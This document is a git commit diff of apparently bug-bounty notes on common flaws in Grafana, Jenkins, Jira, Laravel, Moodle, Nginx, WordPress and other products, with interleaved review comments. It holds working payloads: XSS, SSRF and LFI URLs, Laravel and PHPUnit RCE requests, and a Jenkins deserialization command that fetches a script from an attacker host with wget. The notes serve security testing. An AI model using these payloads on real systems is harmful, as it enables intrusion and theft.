Adding some 'technology' information

This commit is contained in:
Muhammad Daffa 2022-06-18 20:26:55 +07:00
parent a2c07348e3
commit a0048665a1
9 changed files with 169 additions and 67 deletions

View File

@ -1,16 +1,16 @@
# Grafana
1. CVE-2021-41174 (Reflected XSS)
```
<GRAFANA URL>/dashboard/snapshot/%7B%7Bconstructor.constructor('alert(1)')()%7D%7D?orgId=1
https://example.com/dashboard/snapshot/%7B%7Bconstructor.constructor('alert(1)')()%7D%7D?orgId=1
```
2. CVE-2020-13379 (Denial of Service)
```
<GRAFANA URL>/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D
https://example.com/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D
```
3. CVE-2020-11110 (Stored XSS)
```
POST /api/snapshots HTTP/1.1
Host: <GRAFANA URL>
Host: example.com
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Referer: {{BaseURL}}
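Review bot: the placeholder convention is now mixed inside the CVE-2020-11110 request: `Host:` was changed to `example.com`, but `Referer: {{BaseURL}}` still carries the template variable, so a reader cannot tell which tokens are meant to be substituted; either keep the `{{BaseURL}}` style throughout the request or change the Referer to `https://example.com` as well.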
@ -22,7 +22,7 @@ Connection: close
4. CVE-2019-15043 (Grafana Unauthenticated API)
```
POST /api/snapshots HTTP/1.1
Host: <GRAFANA URL>
Host: example.com
Connection: close
Content-Length: 235
Accept: */*
@ -37,5 +37,5 @@ Try to login using admin as username and password
```
6. Signup Enabled
```
<GRAFANA URL>/signup
https://example.com/signup
```
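Review bot: the `6. Signup Enabled` item gives only the URL and no expected result; state what distinguishes an open signup form from the disabled page, and name the setting that closes it (`allow_sign_up` under `[users]` in grafana.ini), so the entry is usable for remediation as well as triage.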

View File

@ -1,4 +1,11 @@
# HAProxy
# HAProxy Common Bugs
## Introduction
What would you do if you came across a website that uses HAProxy?
## How to Detect
-
1. CVE-2021-40346 (HTTP Request Smuggling)
```
POST /index.html HTTP/1.1
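Review bot: the new `## How to Detect` section for HAProxy contains only a bare `-`, which renders as an empty bullet; either fill it in or mark it explicitly as TODO so readers do not take the empty dash for the answer, and drop the `-` once real content exists, as the other files do.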

View File

@ -1,5 +1,18 @@
## Jenkins
1. Deserialization RCE in old Jenkins (CVE-2015-8103, Jenkins 1.638 and older)
# Jenkins Common Bugs
## Introduction
What would you do if you came across a website that uses Jenkins?
## How to Detect
Usually in the HTTP response there is a header like this `X-Jenkins`
1. Find the related CVE by checking jenkins version
* How to find the jenkins version
By checking the response header `X-Jenkins`, sometimes the version is printed there. If you found outdated jenkins version, find the exploit at [pwn_jenkins](https://github.com/gquere/pwn_jenkins)
Some example CVE:
- Deserialization RCE in old Jenkins (CVE-2015-8103, Jenkins 1.638 and older)
Use [ysoserial](https://github.com/frohoff/ysoserial) to generate a payload.
Then RCE using [this script](./rce/jenkins_rce_cve-2015-8103_deser.py):
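Review bot: the list structure in the new Jenkins intro will not render as intended: the `* How to find the jenkins version` bullet under item 1 is followed by an unindented paragraph (`By checking the response header ...`) and by the bare line `Some example CVE:`, so most Markdown renderers close the list there and start a new paragraph; indent the continuation under the bullet. The `X-Jenkins` header tip is also stated twice, once in How to Detect and once under the bullet; one mention is enough.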
@ -9,7 +22,7 @@ java -jar ysoserial-master.jar CommonsCollections1 'wget myip:myport -O /tmp/a.s
./jenkins_rce.py jenkins_ip jenkins_port payload.out
```
2. Authentication/ACL bypass (CVE-2018-1000861, Jenkins <2.150.1)
- Authentication/ACL bypass (CVE-2018-1000861, Jenkins <2.150.1)
Details [here](https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html).
@ -18,13 +31,9 @@ If the Jenkins requests authentication but returns valid data using the followin
curl -k -4 -s https://example.com/securityRealm/user/admin/search/index?q=a
```
3. Metaprogramming RCE in Jenkins Plugins (CVE-2019-1003000, CVE-2019-1003001, CVE-2019-1003002)
Original RCE vulnerability [here](https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html), full exploit [here](https://github.com/petercunha/jenkins-rce).
Alternative RCE with Overall/Read and Job/Configure permissions [here](https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc).
4. CVE-2019-1003030
- CheckScript RCE in Jenkins (CVE-2019-1003030)
How to Exploit:
- [PacketStorm](https://packetstormsecurity.com/files/159603/Jenkins-2.63-Sandbox-Bypass.html)
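Review bot: the conversion from numbered items to bullets is incomplete: `4. CVE-2019-1003030` becomes `- CheckScript RCE in Jenkins (CVE-2019-1003030)`, but the unchanged `3. Metaprogramming RCE in Jenkins Plugins (...)` line above it keeps its number, so the CVE list now mixes a `3.` with `-` siblings; convert that line too.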
@ -56,11 +65,15 @@ to
%70%75%62%6c%69%63%20%63%6c%61%73%73%20%78%20%7b%0a%20%20%70%75%62%6c%69%63%20%78%28%29%7b%0a%22%70%69%6e%67%20%2d%63%20%31%20%78%78%2e%78%78%2e%78%78%2e%78%78%22%2e%65%78%65%63%75%74%65%28%29%0a%7d%0a%7d
5. Git plugin (<3.12.0) RCE in Jenkins (CVE-2019-10392)
2. Default Credentials
```
Try to login using admin as username and password
```
How to exploit:
- [@jas502n](https://github.com/jas502n/CVE-2019-10392)
- [iwantmore.pizza](https://iwantmore.pizza/posts/cve-2019-10392.html)
3. Unauthenticated Jenkins Dashboard
```
Access https://target.com and if there is no login form then it is vulnerable
```
Reference:
- https://github.com/gquere/pwn_jenkins
## Reference
* [pwn_jenkins](https://github.com/gquere/pwn_jenkins)
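Review bot: removing the `5. Git plugin (<3.12.0) RCE in Jenkins (CVE-2019-10392)` heading orphans its two `How to exploit:` links (`@jas502n`, `iwantmore.pizza`), which now sit directly under the new `2. Default Credentials` item and read as if they documented default credentials; either keep a `- Git plugin (<3.12.0) RCE in Jenkins (CVE-2019-10392)` bullet above those links or remove the links together with the heading. The new `3. Unauthenticated Jenkins Dashboard` text, `if there is no login form then it is vulnerable`, also overstates: a dashboard reachable without login is an exposure to confirm and report, not proof of a vulnerability on its own, so phrase it as 'check whether the dashboard is accessible without authentication'.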

View File

@ -1,48 +1,65 @@
# Unauthenticated Jira CVEs
1. CVE-2017-9506 (SSRF)
# Jira Common Bugs
## Introduction
What would you do if you came across a website that uses Jira?
## How to Detect
```
https://<JIRA_URL>/plugins/servlet/oauth/users/icon-uri?consumerUri=<SSRF_PAYLOAD>
https://example.com/secure/Dashboard.jspa
https://example.com/login.jsp
```
2. CVE-2018-20824 (XSS)
1. Find the related CVE by checking jira version
* How to find the jira version
Try to request to `https://example.com/secure/Dashboard.jspa` and then check the source code. You will find this line `<meta name="ajs-version-number" content="8.20.9">` so 8.20.9 is the version jira. If you found outdated jira version, find the CVEs at [CVEDetails](https://www.cvedetails.com/vulnerability-list/vendor_id-3578/product_id-8170/Atlassian-Jira.html)
Some example CVE:
- CVE-2017-9506 (SSRF)
```
https://<JIRA_URL>/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)
https://example.com/plugins/servlet/oauth/users/icon-uri?consumerUri=<SSRF_PAYLOAD>
```
3. CVE-2019-8451 (SSRF)
- CVE-2018-20824 (XSS)
```
https://<JIRA_URL>/plugins/servlet/gadgets/makeRequest?url=https://<HOST_NAME>:1337@example.com
https://example.com/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)
```
4. CVE-2019-8449 (User Information Disclosure)
- CVE-2019-8451 (SSRF)
```
https://<JIRA_URL>/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
https://example.com/plugins/servlet/gadgets/makeRequest?url=https://<HOST_NAME>:1337@example.com
```
5. CVE-2019-8442 (Sensitive Information Disclosure)
- CVE-2019-8449 (User Information Disclosure)
```
https://<JIRA_URL>/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
https://example.com/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
```
6. CVE-2019-3403 (User Enumeration)
- CVE-2019-8442 (Sensitive Information Disclosure)
```
https://<JIRA_URL>/rest/api/2/user/picker?query=<USERNAME_HERE>
https://example.com/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
```
7. CVE-2020-14181 (User Enumeration)
- CVE-2019-3403 (User Enumeration)
```
https://<JIRA_URL>/secure/ViewUserHover.jspa?username=<USERNAME>
https://example.com/rest/api/2/user/picker?query=<USERNAME_HERE>
```
8. CVE-2020-14178 (Project Key Enumeration)
- CVE-2020-14181 (User Enumeration)
```
https://<JIRA_URL>/browse.<PROJECT_KEY>
https://example.com/secure/ViewUserHover.jspa?username=<USERNAME>
```
9. CVE-2020-14179 (Information Disclosure)
- CVE-2020-14178 (Project Key Enumeration)
```
https://<JIRA_URL>/secure/QueryComponent!Default.jspa
https://example.com/browse.<PROJECT_KEY>
```
10. CVE-2019-11581 (Template Injection)
- CVE-2020-14179 (Information Disclosure)
```
<JIRA_URL>/secure/ContactAdministrators!default.jspa
https://example.com/secure/QueryComponent!Default.jspa
```
- CVE-2019-11581 (Template Injection)
```
example.com/secure/ContactAdministrators!default.jspa
* Try the SSTI Payloads
```
11. CVE-2019-3396 (Path Traversal)
- CVE-2019-3396 (Path Traversal)
```
POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: {{Hostname}}
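Review bot: in the CVE-2019-11581 block the line `* Try the SSTI Payloads` sits inside the code fence, so it renders as a literal line of the URL block rather than as the instruction it is meant to be; move it below the closing fence. Two consistency points in the same hunk: `example.com/secure/ContactAdministrators!default.jspa` lacks the `https://` scheme every other entry uses, and the CVE-2019-3396 request keeps `Host: {{Hostname}}` while the rest of the file was just converted to `example.com`. The `## How to Detect` block also lists `/secure/Dashboard.jspa` and `/login.jsp` without saying what to look for; the `ajs-version-number` meta tag described under item 1 is the actual fingerprint and belongs in that section.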
@ -56,10 +73,19 @@ Connection: close
*Try above request with the Jira target
```
12. CVE-2019-3402 (XSS)
- CVE-2019-3402 (XSS)
```
https://<JIRA_URL>/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search
https://example.com/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search
```
Reference:
- https://twitter.com/harshbothra
2. Signup enabled
```
POST /servicedesk/customer/user/signup HTTP/1.1
Host: example.com
Content-Type: application/json
{"email":"test@gmail.com","signUpContext":{},"secondaryEmail":"","usingNewUi":true}
```
## Reference
* [@harshbothra](https://twitter.com/harshbothra)
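Review bot: the raw request under `2. Signup enabled` is malformed: there is no blank line between `Content-Type: application/json` and the JSON body, so the body would be read as another header line; insert the empty line. The context line `*Try above request with the Jira target` confirms the CVE-2019-3396 request was written for a different product (the `/rest/tinymce/1/macro/preview` endpoint and that CVE are Confluence Server's), so say explicitly that it is a Confluence check being tried against Jira hosts. Prefer `test@example.com` over a real mail provider's domain in the sample body.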

View File

@ -1,26 +1,46 @@
# Common bug in laravel framework
1. Laravel PHPUnit Remote Code Execution
* Full Path Exploit : http://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
* Affected versions : Before 4.8.28 and 5.x before 5.6.3
# Laravel Common Bugs
Command
## Introduction
What would you do if you came across a website that uses Laravel?
## How to Detect
Usually in the HTTP response there is a header like this `Set-Cookie: laravel_session=`
1. Find the related CVE by checking laravel version
* How to find the laravel version
By checking the composer file in `https://example.com/composer.json`, sometimes the version is printed there. If you found outdated laravel version, find the CVEs at [CVEDetails](https://www.cvedetails.com/vulnerability-list/vendor_id-16542/product_id-38139/Laravel-Laravel.html)
Some example CVE:
- CVE-2021-3129 (Remote Code Execution)
```
curl -d "<?php echo php_uname(); ?>" http://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
POST /_ignition/execute-solution HTTP/1.1
Host: example.com
Accept: application/json
Content-Type: application/json
{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}
```
2. Exposed environment variables
* Full Path Exploit : http://target.com/.env
2. Laravel 4.8.28 ~ 5.x - PHPUnit Remote Code Execution (CVE-2017-9841)
```
curl -d "<?php echo php_uname(); ?>" http://example.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
```
3. Exposed environment variables
* Full Path Exploit : http://example.com/.env
![Environment Variables](https://1.bp.blogspot.com/-EUTxgP5XE6Q/XkgB4SyWSbI/AAAAAAAAAQA/eqtALOjLKKA46si-lIosm6cDVmxByjzIQCLcBGAsYHQ/s1600/1.png)
3. Exposed log files
* Full Path Exploit : http://target.com/storage/logs/laravel.log
4. Exposed log files
* Full Path Exploit : http://example.com/storage/logs/laravel.log
4. Laravel Debug Mode Enabled
* Using SQL injection query in GET or POST method
* Try path /logout (ex:target.com/logout)
* Using [] in paramater (ex:target.com/param[]=0)
5. Laravel Debug Mode Enabled
* Try to request to https://example.com using POST method (Error 405)
* Using [] in paramater (ex:example.com/param[]=0)
![Laravel Debug Mode](https://hacken.io/wp-content/uploads/2019/07/laravel-screen.png)
Source: [Nakanosec](https://www.nakanosec.com/2020/02/common-bug-pada-laravel.html)
## References
* [Nakanosec](https://www.nakanosec.com/2020/02/common-bug-pada-laravel.html)
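Review bot: the new heading `2. Laravel 4.8.28 ~ 5.x - PHPUnit Remote Code Execution (CVE-2017-9841)` misstates the version note it replaces: the removed text read `Affected versions : Before 4.8.28 and 5.x before 5.6.3`, which are PHPUnit versions and upper bounds, not a Laravel range starting at 4.8.28; restore it as 'PHPUnit before 4.8.28 and 5.x before 5.6.3'. The CVE-2021-3129 request has the same malformed-request problem as the Jira file, no blank line between `Content-Type: application/json` and the JSON body. The stray line `Command` directly under `# Laravel Common Bugs` looks like a leftover and should go, and `paramater` in item 5 is a typo (parameter).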

View File

@ -1,4 +1,10 @@
# Moodle
# Moodle Common Bugs
## Introduction
What would you do if you came across a website that uses Moodle?
## How to Detect
If you visit `https://target.com` and see the source code, you will see `<meta name="keywords" content="moodle,`
1. Reflected XSS in /mod/lti/auth.php via "redirect_url" parameter
```
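Review bot: this file keeps `https://target.com` in `## How to Detect` while the rest of the commit standardises on `example.com`; since `target.com` is a real registered domain, switch to `example.com` (reserved by RFC 2606) here and in the items below so nobody copies a request at a third party by accident.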
@ -8,5 +14,11 @@ https://target.com/mod/lti/auth.php?redirect_uri=javascript:alert(1)
2. Open redirect in /mod/lti/auth.php in "redirect_url" parameter
```
https://classroom.its.ac.id/mod/lti/auth.php?redirect_uri=https://evil.com
https://target.com/mod/lti/auth.php?redirect_uri=https://evil.com
```
3. LFI /filter/jmol/js/jsmol/php/jsmol.php in "query" parameter
```
https://target.com/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd
```
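Review bot: the item headings name the parameter `redirect_url` (`Reflected XSS in /mod/lti/auth.php via "redirect_url" parameter`, `Open redirect in /mod/lti/auth.php in "redirect_url" parameter`) but every URL uses `redirect_uri`; align the headings with the URLs. Replacing the live `classroom.its.ac.id` host with a placeholder is the right call; `evil.com` on the same line is also a real domain and should become a reserved one such as `attacker.example`.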

View File

@ -1,6 +1,17 @@
# Nginx
# Nginx Common Bugs
1. Directory traversal
## Introduction
What would you do if you came across a website that uses Nginx?
## How to Detect
Usually in the HTTP response there is a header like this `Server: nginx`
1. Find the related CVE by checking nginx version
* How to find the nginx version
By checking the response header or using 404 page, sometimes the version is printed there. If you found outdated nginx version, find the CVEs at [CVE Details](https://www.cvedetails.com/vulnerability-list/vendor_id-315/product_id-101578/F5-Nginx.html)
2. Directory traversal
```
https://example.com/folder1../folder1/folder2/static/main.css
https://example.com/folder1../%s/folder2/static/main.css
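Review bot: the `%s` in `https://example.com/folder1../%s/folder2/static/main.css` reads like a leftover printf placeholder and is never explained; either state that it stands for an arbitrary path segment or drop those variants. The item should also name the root cause, an `alias` directive inside a `location` whose path has no trailing slash, so readers can recognise and fix the misconfiguration rather than only probe for it.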
@ -9,3 +20,8 @@ https://example.com/folder1/folder2../%s/static/main.css
https://example.com/folder1/folder2/static../static/main.css
https://example.com/folder1/folder2/static../%s/main.css
```
3. Nginx status page
```
https://example.com/nginx_status
```
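Review bot: `3. Nginx status page` would be more useful with one line on what `/nginx_status` exposes (the `stub_status` counters: active connections and accepted/handled requests) and on the fix, restricting that location with `allow`/`deny` or removing it; as written the reader only learns the path.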

View File

@ -3,6 +3,9 @@
## Introduction
What would you do if you came across a website that uses WordPress?
## How to Detect
If you visit `https://target.com` and see the source code, you will see the links to themes and plugins from WordPress. Or you can visit `https://target.com/wp-login.php`, it is the WordPress login admin page
1. Find the related CVE by checking the core, plugins, and theme version
* How to find the wordpress version
```
@ -99,3 +102,8 @@ Host: target.com
</param></params>
</methodCall>
```
7. Register enabled
```
http://example.com/wp-login.php?action=register
```
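Review bot: `7. Register enabled` gives the URL only; add what a positive looks like (a registration form instead of the 'User registration is currently not allowed.' message) and the setting behind it (`Anyone can register` under Settings > General, the `users_can_register` option), so the entry supports the fix as well as the finding. The new item uses `example.com` while the unchanged `Host: target.com` context line in the same file uses a different placeholder; pick one.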

View File

@ -1,10 +1,10 @@
# Common bug in Zend framework
# Zend Common Bugs
## Introduction
What would you do if you came across a website that uses Zend?
## How to Detect
-
1. Finding config files
```
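Review bot: as in the HAProxy file, `## How to Detect` for Zend holds only a bare `-`; fill it in or mark it TODO explicitly rather than leaving an empty bullet.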